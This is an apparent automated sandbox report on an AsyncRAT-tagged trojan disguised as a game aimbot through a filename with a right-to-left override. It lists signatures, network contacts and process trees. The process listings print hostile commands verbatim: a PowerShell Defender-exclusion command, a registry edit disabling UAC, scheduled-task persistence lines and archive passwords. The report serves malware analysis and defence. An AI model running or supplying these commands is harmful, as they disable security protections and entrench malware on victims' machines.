Malware Analysis Report

2025-06-16 05:44

Sample ID 240301-1t79jaeb23
Target Aimbot Resou‮nls..scr
SHA256 194c0a05958c8ead4bfa916ace6e1a5acdb7f433ce57c1d48abc9160a6bca4e5
Tags
asyncrat chromecrash windowsservices evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

194c0a05958c8ead4bfa916ace6e1a5acdb7f433ce57c1d48abc9160a6bca4e5

Threat Level: Known bad

The file Aimbot Resou‮nls..scr was found to be: Known bad.

Malicious Activity Summary

asyncrat chromecrash windowsservices evasion persistence rat trojan

UAC bypass

AsyncRat

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Modifies registry key

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-01 21:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-01 21:57

Reported

2024-03-01 22:00

Platform

win7-20240221-en

Max time kernel

117s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr" /S

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr" /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 rentry.co udp
US 172.67.145.129:443 rentry.co tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp

Files

memory/2016-0-0x0000000000FA0000-0x0000000000FFA000-memory.dmp

memory/2016-1-0x0000000074CC0000-0x00000000753AE000-memory.dmp

memory/2016-2-0x00000000004B0000-0x00000000004F0000-memory.dmp

memory/2016-3-0x0000000000EA0000-0x0000000000F52000-memory.dmp

memory/2016-4-0x0000000074CC0000-0x00000000753AE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-01 21:57

Reported

2024-03-01 22:00

Platform

win10v2004-20240226-en

Max time kernel

135s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr" /S

Signatures

AsyncRat

rat asyncrat

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Public\Videos\Service.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\7zr.exe N/A
Token: 35 N/A C:\ProgramData\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\7zr.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\7zr.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 1784 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 1784 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 1784 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe
PID 1784 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe
PID 1784 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe
PID 4184 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Windows\SysWOW64\cscript.exe
PID 4184 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Windows\SysWOW64\cscript.exe
PID 4184 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Windows\SysWOW64\cscript.exe
PID 2488 wrote to memory of 3328 N/A C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 3328 N/A C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 3328 N/A C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cmd.exe
PID 3328 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1972 wrote to memory of 1720 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1972 wrote to memory of 1720 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1972 wrote to memory of 1720 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Videos\Service.exe
PID 3328 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Videos\Service.exe
PID 2616 wrote to memory of 4656 N/A C:\Users\Public\Videos\Service.exe C:\Windows\SYSTEM32\cmd.exe
PID 2616 wrote to memory of 4656 N/A C:\Users\Public\Videos\Service.exe C:\Windows\SYSTEM32\cmd.exe
PID 4656 wrote to memory of 3476 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 3476 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 2472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\reg.exe
PID 4656 wrote to memory of 2472 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\reg.exe
PID 4184 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 4184 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 4184 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Local\Temp\7zr.exe
PID 4184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe
PID 4184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe
PID 4184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4392 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4184 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe
PID 4184 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe
PID 4184 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2516 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4184 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe
PID 4184 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe
PID 4184 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe
PID 736 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 736 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr

"C:\Users\Admin\AppData\Local\Temp\Aimbot Resou‮nls..scr" /S

C:\Windows\SysWOW64\cmd.exe

"cmd" /C "C:\Users\Admin\AppData\Local\Temp\qjut2lwwde.sln"

C:\Users\Admin\AppData\Local\Temp\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\1r1zh13mzo.7z" -o"C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744" -phR3^&b2%A9!gK*6LqP7t$NpW

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe

"C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe"

C:\Windows\SysWOW64\cscript.exe

"cscript.exe" /B /NoLogo "C:\Users\Public\Videos\b.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\b.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Videos\Service.exe

C:\Users\Public\Videos\Service.exe

C:\Windows\SYSTEM32\cmd.exe

cmd /c babel.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command "$defenderExclusions = Get-MpPreference; $defenderExclusions.ExclusionPath = $defenderExclusions.ExclusionPath + 'C:\'; Set-MpPreference -ExclusionPath $defenderExclusions.ExclusionPath"

C:\Windows\system32\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\884a6dca-87b0-4865-b23e-f822bb58cdaa.7z" -o"C:\Users\Admin\AppData\Local\Temp\V884a6dca-87b0-4865-b23e-f822bb58cdaa" -pSaToshi780189.!

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "aitstatic" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "ComSvcConfig" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "MicrosoftCertificateServices" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe"

C:\ProgramData\7zr.exe

"C:\ProgramData\7zr.exe" x "C:\ProgramData\884a6dca-87b0-4865-b23e-f822bb58cdaa.7z" -o"C:\ProgramData\MicrosoftTool" -psomaliMUSTAFA681!!...

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "chcp"

C:\Windows\SysWOW64\chcp.com

chcp

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\urrzyzrlmlnyvywx" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1892 --field-trial-handle=1896,i,17586043586348885806,1071459919229969220,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\urrzyzrlmlnyvywx" --mojo-platform-channel-handle=2176 --field-trial-handle=1896,i,17586043586348885806,1071459919229969220,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\ProgramData\MicrosoftTool\current\Microsoft.exe

"C:\ProgramData\MicrosoftTool\current\Microsoft.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe

